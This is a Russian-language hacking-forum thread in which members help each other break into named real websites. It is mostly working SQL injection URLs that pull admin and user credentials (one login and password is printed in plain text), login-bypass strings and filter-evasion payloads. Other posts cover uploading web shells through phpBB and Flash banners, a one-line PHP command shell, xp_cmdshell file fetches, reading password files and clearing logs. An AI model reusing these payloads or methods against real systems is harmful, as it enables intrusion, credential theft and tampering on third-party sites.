узнай че висит на сервере
Я новичек поэтому жаргон еще не совсем знаю... :)
Сори за тупой вопрос... А висит на сервере это типа какие демоны запущены или что? и искать эксплойт под ядро операционки или под какую то другую лажу?

стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать :)
смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304

Вопрос такой:
могу заливать и вешать баннеры на одном хосте.
проверки антивирем содержимого баннера нету, фильтрация по расширению не стоит (вроде как).
Директорию, куда пишутся файлы не получилось определить, и походу там есть несколько моих вебшеллов :-/

возможно ли записать в тело баннера код, который бы автоматичевки выполнялся при загрузке баннера?
что можно выжать максимально из возможности заливки и вывешивания баннеров (что-то вроде iframe, автоматической переадресации на "нужный сайт", запихнуть в него сплоит. или что нибудь в таком духе)

В вопросе по устройству и возможностях swf-файлов ничего не знаю, вот и задаю вопрос (-

Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.

Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.
баннер это не картинка, a "Shockvawe Flash Object" :-\ анимашка.


data="http://_______/banners/c99madshell.php.SWF"
.........
<param name="movie" value="banners/c99madshell.php.SWF">


захожу в дерикторию /banners/ и она пустая, файлов нет Х___х
нужны действующие способы (- репой закидаю (-

Если баннер заливается (и не в БД) и с любым расширением - то можешь просто в конец флешки записать шелл в хекс-редакторе. Если расширение полюбому SWF, то те нужно именно флешку заливать с определённым кодом (ЭкшенСкрипт) редиректа - это максимум

смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304
не прокатит, потому что это не эксплоит, а шеллкод

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
sergey : q1w2e3
там есть менюшка с логами , вот как их отчистить?

Как можно безпалевно проверить днс сервер на эту http://www.securitylab.ru/vulnerability/355730.php дыру?

Помогите все знаю, но логин и пасс не могу выташить
_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat_ws(0x3a3a,column_nam e),5,6,7+from+information_schema.columns+where+tab le_name=char(112,111,108,108,95,117,115,101,114)--


_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,

0x3a,userpass),5,6,7+from+poll_user--

_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD

Sindicat
Я точно не смотрел, но кажется что надо пробить тебе на database(), а потом просто использовать конкатенацию +from+database_name.table_name
И зачем чарить в конце? Захекси =)
Честно-лень смотреть. Мог бы и не писать,скажете вы. Но не писать вообще лень =)
Там же вообще выводится что либо? Принтабельные есть? Т.к. ошибка скачет постоянно...
Без обид, я немного выпил "за сегодняшний удачный день!" =)

ThreeD абсолютно прав, мне было не лень )
http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,%200x3a,use rpass),5,6,7+from+d8242sd5804.poll_user--

спасибо !!! мне все - ровно не понятно я вывел database() , получил d8242sd15320 - а у тебя получился d8242sd5804 почему так ?

Sindicat
Видимо таблица poll_user относится к d8242sd5804 а не к d8242sd15320, иначе бы и конкатенацию использовать не пришлось. Не одна база просто, и ты сидишь не под нужной тебе. А используя d8242sd5804.poll_user, ты получаешь инфу из нужной тебе базы, которой является d8242sd5804, к которой и относится таблица poll_user.
В базе d8242sd15320 таблицы poll_user нет. Юзай concat_ws(0x3A3a,table_schema,table_name)+from+inf ormation_schema.tables , чтобы узнать к какой базе относится нужная тебе таблица.

На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
admin'
or 1=1--
но не получается. Как правильно ввести данные?

Народ объясните что такое в шелле C99 в тулс.....

Binding port
Back connection
Datapipe

ЧТО ЭТО ВООБЩЕ ТАКОЕ??? если можно то каждую функцию отдельно объясните

Биндшелл, это когда открывается порт на машине.Binding port.
Бэкконект рулит когда тачка за натом, к твоей тачке коннектит, а ты на свой врубаешь неткат и слушаешь порт, на который должен быть коннект. Хотя я могу ошибаться, но вроде таг =) *пошёл за пивом* ))))

На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql

но не получается. Как правильно ввести данные?
Access не поддерживает комментарии вот это "--" не катит, прочитай наконец статью

https://forum.antichat.net/threadnav50550-1-10.html

diznt
ЭЭЭ. Ёпта, там датапайп исчо...
Вроде он перебрасывает tcp/ip пакеты на другой хост, любой. Для анонимности типа.

На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql

но не получается. Как правильно ввести данные?

Это так теория, в твоём случае она не применима, но знать будет полезно (для других БД, к примеру мускул).

Это зависит только от запроса, т.е. найти вариант, который прокатывал бы в каждой админке с уязвимой авторизацией не реал.

1. "--" будет служить символом комментария только если после этого чуда идёт пробел, а в админках часто используется обрезание пробельных символов по краям, так что лучше юзать так: "-- 1".

2. Пробывать лучше это:

login' or 1=1-- 1
password' or 1=1-- 1

3. Часто бывает что без извращений с юнионом в админку по скуле в авторизации не попасть, но тут не видя сорца скрипта сделать что либо почти не реал.

Хотя в крации расскажу:

Если авторизации (т.е. проверка правильности введённой инфы) проходит только по результату запроса, то прокатывает посдановка вышеуказанной комбинации.
А бывает, что из запроса (по логину) достается соотвествующий пароль или хеш пароля, а уже затем он сравнивается с введённым тобою, что то вроде этого:

select password from admin where login = '$login';

В таких случаях нужно через объединение запросов впихивать левые данные:

логин = 1' and 1=2 union select 'pass'-- 1
И пароль соответственно = pass

Ну или есть хеширование:

логин = 1' and 1=2 union select md5('pass')-- 1
И пароль соответственно = pass

Но это так теория, на практике это будет геморно осуществить.

4. Ещё как вариант попробовать раскрутить инъекцию как слепую - тоже частенько удаётся сделать.

4. Ещё как вариант попробовать раскрутить инъекцию как слепую - тоже частенько удаётся сделать.

В данном случае ты имеешь ввиду посимвольный перебор с использованием подзапросов? Я не сталкивался ни разу с подобным извращением в авторизации. Можно конкретнее (примерчик например )).

ThreeD а что он слушает то на бек конекте???

дизнт
А как ты думаешь? ) Музыку в основном.

_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD
Ну а как хоть как то чекнуть днс на эту дырку http://www.securitylab.ru/vulnerability/355730.php ???

Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+null,null,123+from+information_sche ma.tables--

Чар тебе в помощь.

чар тоже не работает)), как быть?

можно ли пролезть вот в такую багу сайта?
http://www.hotindex.ru/Details.aspx?id=6927

Багом назвать это трудно конечно...

Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+null,null,123+from+information_sche ma.tables--

Первое поле нормально выводится:

http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+table_name,null,null+from+informati on_schema.tables--


можно ли пролезть вот в такую багу сайта?
http://www.hotindex.ru/Details.aspx?id=6927

нельзя, это не баг

помогите.. через mysql подобрал таблицы и колонки нашел таблицу wp_users запросом через information_schema в ней через information_schema.columns намел калонку user_pass и user_name вообщем все что нужно для счастья. но при запросе 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+w p_users -- пишет Table 'hoys.wp_users' doesn't exist и ошибки тоесть он не может таблицу найти автоматом приписывает логин свой... в чем проблема? как это обойти?

Ghost0ff Она в другой базе, это 1000000 раз разбиралось, последний раз вчера в этой-же теме
тоесть он не может таблицу найти автоматом приписывает логин свой... в чем проблема? как это обойти?О_o Какой ещё логин? :D

1) Ищем что такое на самом деле hoys:

+union+select+1,table_schema,3,4,5,6,7,8,9,10,11,1 2,13,14,15+from+information_schema.columns+where+t able_name='wp_users'--

Допустим вывело на экран "forum", тогда твой запрос будет такой:

2) 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+f orum.wp_users --

1) Ищем что такое на самом деле hoys:Я тебе без вяких поисков скажу, это база с которой работает скрипт
(только тсссс, это превад инфа) :D

О! все выбил хэш. Спасибо большое. +1. впредь глупых вопросов забавать не буду ;)

Есть sql server с правами SA. Через xp_cmdshell телнетится с него куда-либо не могу , но могу пинговать. Как можно внешний ip этого sql сервера пробить. К примеру у меня есть дедик (WIN). Что можно на него заинсталить, чтоб оно отображало кто пингует? :) ТОлько простенькое, файр туда ставить не хочется :D

SHS, ставь сниффер :)

Cain & Abel сойдет? И где там палить эти пакеты. :)

Хз, каина не юзал. Юзал вот это:
http://www.winpcap.org/windump/install/
или
http://www.softportal.com/screenshot-4938-tcpdump-for-windows.html

Пробну через Ettercap пожалуй.

Не вышло чет, мб я что-либо сделал неправильно. Жду советов. Желательно по конкретнее что да как )

Скачивай tftp сервер (http://tftpd32.jounin.net/tftpd32_download.html), запускай на своем компе, указав папку, из которой будут закачиваться файлы на удаленный сервер. Теперь выполняй команду через инъекцию:
;exec master..xp_cmdshell 'tftp -i [твой ip] GET [любой файл из папки] [путь нового файла]'--
например
;exec master..xp_cmdshell 'tftp -i 12.34.56.78 GET blabla.txt C:\blabla.txt'--
Во время закачивания файл на удаленный сервер, можно видеть список активных подключений. Во вкладке Log viewer также можно увидеть адреса всех клиентов.

палевно все-таки к своему айпи конектица...

Да вот в том то и дело, что кроме пинга я ничего не могу делать (видать файр, ито не стандартный).

так можно не к своему =)

SHS, чем win(tcp)dump не нравится? :) Запускаешь и ловишь пакеты ;)

Просто я никогда их не использовал. Мой любимый сниф- Ettercap. Другие познавать это время, а времени нет.

Там не нужно ничего познавать. Единственный аргумент, который тебе придется использовать это "-i", для указания интерфейса(если он не один).
Пример:
C:\tcpdump.exe -i 2
Все :)

Привет!
Надеюсь пишу в нужную тему. Ситуация: есть самописный движок на ASP .NET, база Access. Пытаюсь сделать SQL inj вида:

_http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+tablename%00

При этом получается ошибка: Exception Details: System.InvalidCastException: Specified cast is not valid. Т.е. как я понимаю где-то в запросе данные преобразуются и проверяются... Можно ли как-то просто вычислить это место?

Табличка и тип базы точно известны, т.к. удалось успешно использовать почти такую же inj в другом проекте на этом движке :-) Но там использовалась уязвимость в части, которой на нужном сайте просто нет. Число параметров подобрано по order by

tempuser
помнится когда я хекал maccess делал чтото типо этого для вывода табл.
http://site.com/page.aspx?page=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('views'))--
а так бы ссылочку посмотреть )

помнится когда я хекал maccess делал чтото типо этого для вывода табл.
это был mssql, а не access
Exception Details: System.InvalidCastException: Specified cast is not valid
видимо проблемы с преобразованием типов данных, хотя для access это не свойственно. Возможное решение можно бы было найти в MS Access Cheat Sheet, но тот сайт закрыли. Ни у кого не осталось?
upd а вот нашел - http://www.xuexi123.net/chm/MS%20Access%20SQL%20Injection%20Cheat%20Sheet.htm
правда инфы по поводу преобразования типов данных нет

Time Machine

tempuser
помнится когда я хекал maccess делал чтото типо этого для вывода табл.

а так бы ссылочку посмотреть )

Зачем в INFORMATION_SCHEMA.TABLES лезть то? Во первых её просто нету в access (вы с MySQL путаете :-) ), а во вторых имя нужной таблицы с пользователями известно на 100%. Также известны имена полей в этой табличке. Известна даже админка ))) Но блин тип какого то параметра походу не совпадает... И обломс.

Ссылочку - сорри. Сайт довольно дружественный, не хотелось бы случайно вандализировать :-) Ковыряюсь в нем из чистого любопытства.

Вот более подробно сообщение об ошибке:


Server Error in '/' Application.
Specified cast is not valid.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.InvalidCastException: Specified cast is not valid.

Source Error:

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[InvalidCastException: Specified cast is not valid.]
System.Data.OleDb.OleDbDataReader.GetBoolean(Int32 ordinal) +44
ecomm.CPage.InitFromDataReader(OleDbDataReader dr)
ecomm.CPage..ctor(String ID, String PageName, String conStr)
ecomm.PageTemplateControl.get_vieName()
ecomm.PageTemplateControl.InitControl()
ecomm.TemplateControl.CreateChildControls()
System.Web.UI.Control.EnsureChildControls() +100
System.Web.UI.Control.PreRenderRecursiveInternal() +38
System.Web.UI.Control.PreRenderRecursiveInternal() +125
System.Web.UI.Control.PreRenderRecursiveInternal() +125
System.Web.UI.Control.PreRenderRecursiveInternal() +125
System.Web.UI.Page.ProcessRequestMain() +1499


Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407

http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+tablename%00
попробуй все числа null'ами заменить:
union select null,null,null,...
потом последовательно заменяй null на числа, строки.
Вот список функций в Access, может понадобиться:
http://www.techonthenet.com/access/functions/index_alpha.php

попробуй все числа null'ами заменить:

Помогло :-) Правда не до конца, но похоже он ругается на четвертый параметр, при замене его на null ошибка изменяется на
Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.

Пока ситуация такова:
1. На 2 следующих запроса
1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21
1,2,3,CDec(1),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21
отвечает Object reference not set to an instance of an object

2. На все остальное вида
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21
1,2,3,CHR(66),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21
отвечает Specified cast is not valid . Проверены int, string, byte, bool, всякие даты, CDate.

null и double... Что у них общего и чем они отличаются от int или char? Или с double уже угадал и ему не нравится что то ещё? Но если угадал, то почему ошибка на остальное не cast как раньше а object reference?

В общем сервер немножко сломался :lol: Счас выкидывает ошибку Unspecified error прямо на главной странице сайта и в общем то не работает. Мда... Перестарались.......

Вопрос с активной хсс вобщем на внтутресетевом торенте нашол активную хсс. Когда делаеш раздачю в название пишеш название потом пишу хсс она пашет но она отображается в название можно её скрыть как-то ?

Народ имееться шелл на двиге SMF 1.1.4
Когда смотрю Л.С. через базу то меня интересует когда ПМ отправилось!
А там показываеться это!


msgtime

1227282680

Как это понимать?

<?
echo date("d.m.Y H:i", 1227282680);
?>


21.11.2008 18:51

имеется sql inj
_http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,2,3,4--
если делаю чтонибудь наподобие:
_http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,VERSION(),3,4--
то выводится ошибка:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
что я не правильно делаю? как тут быть?

http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4--
я первый!

http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4--

add:
Raz0r, :(

Ребят, вот на первый взгляд SQL на сайте Онтона Усральского:
http://anton-uralskiy.ru/index.php?option=com_fireboard&Itemid=-1'+union+select+1/*

Пробовал по всякому, в начале подставлял и -1, и -1' и -1%27, -1%2527
В конце и /* потом # далее +-- и просто -- %23.

Но всё глухо, нигде нету "предложения" правильно указать колонки.
Я в этом не очень хорошо шарю, тут возможен вывод, или просто обычная ошибка?

Главная You have an error in your SQL syntax near \'union+select+1/*\', \'90.150.48.**\', \'0\')\' at line 1 SQL=INSERT INTO jos_fb_whoisonline (`userid` , `time`, `what`, `task`, `do`, `func`,`link`, `userip`, `user`) VALUES (\'0\', \'1227551255\', \'Главная\',\'\',\'\',\'\',\'/index.php?option=com_fireboard&Itemid=-1\'+union+select+1/*\', \'90.150.**.**\', \'0\')

Скуль в инсерте. Толку нету. Таблица бестолковая, да и magic_quotes_gpc = on. Можешь забить на неё.

Ребят, вот на первый взгляд SQL на сайте Онтона Усральского:
http://anton-uralskiy.ru/index.php?option=com_fireboard&Itemid=-1'+union+select+1/*

Пробовал по всякому, в начале подставлял и -1, и -1' и -1%27, -1%2527
В конце и /* потом # далее +-- и просто -- %23.

Но всё глухо, нигде нету "предложения" правильно указать колонки.
Я в этом не очень хорошо шарю, тут возможен вывод, или просто обычная ошибка?

нихрена там нет. Ищи на багтреках про жумлу

Вопрос такой... phpbb3 форум.. я задал тут вопрос как мне через админку залить шелл? ответили что через восстановление базы и в коде :UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=phpinfo() WHERE user_id=2;
Сработало однако )) Но вот незадача... я хз че дальше то делать. Что можно выполнить используя данный код. что то прописать в нем вместо phpinfo()? подскажите...

видимо, любую пхп комманду =)

Вопрос такой... phpbb3 форум.. я задал тут вопрос как мне через админку залить шелл? ответили что через восстановление базы и в коде :UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=phpinfo() WHERE user_id=2;
Сработало однако )) Но вот незадача... я хз че дальше то делать. Что можно выполнить используя данный код. что то прописать в нем вместо phpinfo()? подскажите...
Пиши пиши....
copy('http://sute.ru/shell.txt','/home/site/phpbb3/avatars/shell.php');
Примерно так... в первом параметре ссылку на шелл во втором полный путь до файла который создать.

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Здесь проблема в кодировке, или в отстутсвии оператора UNION?

В кодировке. Пробуй convert(concat(version())+using+latin1)

union+select+1,unhex(hex(version())),3/*

convert(version(),binary)
AES_DECRYPT(AES_ENCRYPT(CONCAT(version()),0x71),0x 71)
...
Давай все поперечисляем?

Действительно, в кодировке.
Спасибо :)

хм... вот такая вот ошибочка когда пытаюсь залить код с copy:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx/httpdocs/f' at line 1

UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='forum:copy('http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx.ru/httpdocs/forum/avatars/shall.txt')' WHERE user_id=2

Line : 980
File : admin_db_utilities.php


Подумал можт дело в '' убрал их... залилось но выдает пустую страничку (((((

Ghost0ff
в пхпбб какой версии пытаешся залить шелл? кинь данные в пм зделаю)

Ясен пень, что дело в кавычках. Внутренние апострофы экранировать надо.

Ясен пень, что дело в кавычках. Внутренние апострофы экранировать надо.
хм... это как? оО кинь ссылко на источник или объясни плз

а что system(wget get и т.д) уже не в моде? или отключён? Лишний гемор всё это...

а что system(wget get и т.д) уже не в моде? или отключён? Лишний гемор всё это...
+1
Всё равно спросят )
'<?system($_GET[cmd]);?>'
Или так, если кавычки не катят.
0x3c3f2073797374656d2824636d64293b203f3e
Потом обращаешься к нему
shell.php?cmd=ls -la
wget'oм заливаешь шелл со своего хоста.

Подскажите как бороться с такой ошибкой?

error in query 'select *, count(news_id) as news_count, news_id, category.category_id from category left join news using(category_id) where category.category_id = 38 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24/* group by category.category_id' Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

столбцов 24,судя по order by!
Ссылку выложить к сожалению не могу

@WisP™
error in query 'select *, count(news_id) as news_count, news_id, category.category_id from category left join news using(category_id) where category.category_id = 38 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24/* group by category.category_id' Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
там же LEFT JOIN, нужно так:
-1 GROUP BY category.category_id UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24/*

опять я запутался..

urbanwild@localhost - user
5.0.17-nt-log - version


CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
VIEWS
USER_PRIVILEGES
menu
wysiwyg
tbl_news
tbl_pages
tbl_wysiwyg

не могу посмотреть содержимое столбцов
http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(COLUMN_NAME)),3,4+FROM+ INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USER_ PRIVILEGES'+LIMIT+1,1--

опять я запутался..
не могу посмотреть содержимое столбцов
http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(COLUMN_NAME)),3,4+FROM+ INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USER_ PRIVILEGES'+LIMIT+1,1--

хекси название таблиц без кавычек.
http://snak3.h17.ru/tools

к примеру USER_PRIVILEGES будет выглядеть как:16bit:0x555345525f50524956494c45474553

Приветствую Всех.

Вытащил все из /etc/passwd/ вот такого вида:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

Как я понимаю, тут одни логины, пассы должны лежать в etc/shadow, там пусто, так как доступно только для пользователя с рутовами правами...

Подскажите, как дальше действовать?

Приветствую Всех.

Вытащил все из /etc/passwd/ вот такого вида:

Как я понимаю, тут одни логины, пассы должны лежать в etc/shadow, там пусто, так как доступно только для пользователя с рутовами правами...

Подскажите, как дальше действовать?
хэши паролей заменены на 'x', так что содержание файла бесполезное.

посмотри так же: /etc/shadow.old
/etc/​passwd.tmp
/etc/master.passwd

но сомневаюсь, что ситуация изменится (-

хэши паролей заменены на 'x', так что содержание файла бесполезное.

посмотри так же: /etc/shadow.old
/etc/​passwd.tmp
/etc/master.passwd

но сомневаюсь, что ситуация изменится (-


Да, везде пусто. Обидно.
Еще как-нибудь можно подлезь? Есть варианты?

Добрый день

Подскажите пожалуйста как вывести в ошибке MSSQL данные типа "int"

1+or+1=(SELECT intColumn ...) не вызывает ошибки в случае если column имеет тип int, только при varchar.

Спасибо.

Да, везде пусто. Обидно.
Еще как-нибудь можно подлезь? Есть варианты?
а порутать с помощью сплоента?!

а порутать с помощью сплоента?!

Какой посоветуешь?

Какой посоветуешь?

введи uname -a, напиши на форуме что выдаст

Вопрос:
Короче есть бажный параметр mssql-inj.
.asp?id=.....
Запросы типа -1+or+1=(@@version), db_name() и тд проходят на ура.
Скрипт фильтрует операторы (select, update, и тд..).
Какие методы обхода фильтраций существуют? В mysql много знаю, а вот s mssql впервые столкнулся.

ссылку в пм или сюда

Добрый день

Подскажите пожалуйста как вывести в ошибке MSSQL данные типа "int"

1+or+1=(SELECT intColumn ...) не вызывает ошибки в случае если column имеет тип int, только при varchar.

Спасибо.
1 or 1=(SELECT cast(name as nvarchar(4000)) FROM table)--
1 or 1=(SELECT convert(nvarchar,name) FROM table)--

Какие методы обхода фильтраций существуют? В mysql много знаю, а вот s mssql впервые столкнулся.
';EXEC('SEL'+'ECT US'+'ER')--

']1 or 1=(SELECT cast(name as nvarchar(4000)) FROM table)--
1 or 1=(SELECT convert(nvarchar,name) FROM table)--
Оба эти запроса не выдали ошибку :S.

Используется mssql в связке с ASP.Net.

Microsoft SQL Server 2000 - 8.00.2187 (Intel X86) Mar 9 2006 11:38:51 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

попробуй так
1 or 1=(select convert(int,substring(convert(varchar,name)+char(5 8),1,999)) from table)--

hi

sorry need to write in english

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13%20from%20mysql.user

i got all that and when user

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11 ,12,13%20from%20mysql.user

doesnt appear

how to move on

thanx

']';EXEC('SEL'+'ECT US'+'ER')--

Exec тоже под фильтром.
Я попробовал сделать так :
page.asp?id=-1+or+1=(char(0x73)%2bchar(0x65)%2bchar(0x6c)%2bcha r(0x65)%2bchar(0x63)%2bchar(0x74)%2bchar(0x7e)%2b+ user)--sp_password

Получил:

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'select~dbo' to data type int.

Если же попробовать к примеру top 1 table_name from .... , то тут уже нестыковка синтаксиса.

Салют народ =)
Прошу помощи.
Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden

Forbidden

You don't have permission to access /page/about_tema.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
__________________________________________________ __
Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

Поля подобрал верно стопудофф.
Ввожу
/page/about_tema.php?id=16+union+select+1,2,3,4,5,6--
и ппц. :(
Что это может быть и как бороться?

Вы не имеете прав доступа к /page/about_tema.php. 403 - Запрещено!

Я понимаю, что запрещено. Я спарашиваю почему, и как это обойти.
Ведь я могу обращаться к скрипту просто, и при подборе ордер бай тоже могу, всё выводит как надо, но при юнион селект вот такая фигня.

читай личку. возможно поможет (-

Спасибо. Помогло, практически. Но суть понял )
+

Салют народ =)
Прошу помощи.
Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden


Поля подобрал верно стопудофф.
Ввожу
/page/about_tema.php?id=16+union+select+1,2,3,4,5,6--
и ппц. :(
Что это может быть и как бороться?
Там фильтры стоят на комбинации union select и прочее. Надо вот так:
http://www.site.com/pages/blog_historial.php?MUESBLOG=BLOG&VALOTEMA=107+AND+ascii(lower(substring(version(),1 ,1)))=53
стоит 5 версия мускула, можно при желании все вытянуть...
/home/site/public_html/ путь от корня к WWW
Можно просматривать содержимое каталога:
http://www.site.com/admin/includes/
Вот сдесь по всей видимости конфигурационные данные
http://www.site.com/admin/includes/configuracion.php

Система - линукс
Открытые порты: 21, 25, 26, 53, 80, 110, 143, 443, 465, 993, 995, 3306
Думаю самый вариант в твоем случае ломать соседние сайты, а их 346 =)

PS адресс сайта убрал по просьбе Imperou$

Всем спасибо.
_Pantera_ в частности. Разобрался. Вопрос решён.

hi

sorry need to write in english

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13%20from%20mysql.user

i got all that and when user

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11 ,12,13%20from%20mysql.user

doesnt appear

how to move on

thanx

http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11 ,12%20,13%20from%20mysql.user+limit+1,1

@AHMED HASSAN
the first record in the mysql.user table is empty, so start with the second one:
http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,concat(user,0x3a ,password),7,8,9,10,11,12%20,13%20from%20mysql.use r+limit+1,1

@zannussi
похоже на самописный двиг

можно ли как-нибудь кроме брута узнать названия столбцов/таблиц, если версия муслуля менше 5?

можно ли как-нибудь кроме брута узнать названия столбцов/таблиц, если версия муслуля менше 5?
нет

есть небольшая загвоздка) понять почему так не могу((
на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?

есть небольшая загвоздка) понять почему так не могу((
на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
у тебя нехватает прав для его просмотра. Для примера
/etc/shadow
Он есть, но прочитать ты его не сможешь :)

Всем привет!

Разъясните...

Есть скуля - information_schema - доступно.

далее:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_name,0x3a,column_n ame)4,5,6,7,8+from+information_schema.columns--

вываливаются куча всего и там я выцепляю routines:sql_admin
далее:
http://site.com/non.php?id=-6+union+select+1,2,sql.admin,4,5,6,7,8+from+routin es--

ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--

отображается "information_schema"
подставляю:
http://site.com/non.php?id=-6+union+select+1,2,sql_admin,4,5,6,7,8+from+inform ation_schema.routines--

Страница без ошибок обновляется, но ни какой инфы нет.

Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?

Спасибо!

Хотелось бы ссылочку на сайт.

Хотелось бы ссылочку на сайт.

Не хотел бы разглашать )))) ну, сам понимаешь ...

http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
отображается "information_schema"
мм.. даже не знаю что сказать .. даже не сталкивался ..
попробуй это
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
